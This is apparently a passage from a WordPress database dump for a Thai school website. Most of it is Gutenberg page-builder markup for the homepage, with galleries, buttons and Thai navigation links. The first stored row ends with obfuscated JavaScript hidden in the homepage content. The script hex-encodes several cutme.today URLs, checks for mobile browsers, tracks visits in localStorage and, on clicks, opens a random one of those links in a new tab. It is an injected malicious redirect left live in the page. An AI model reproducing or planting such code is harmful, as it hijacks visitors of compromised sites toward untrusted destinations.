\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-07-03 12:00:02','2025-07-03 05:00:02','',14,'http://pakhaeng.ssk.in.th/?p=1656',0,'revision','',0),
(1658,1,'2025-07-03 12:08:11','2025-07-03 05:08:11','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" 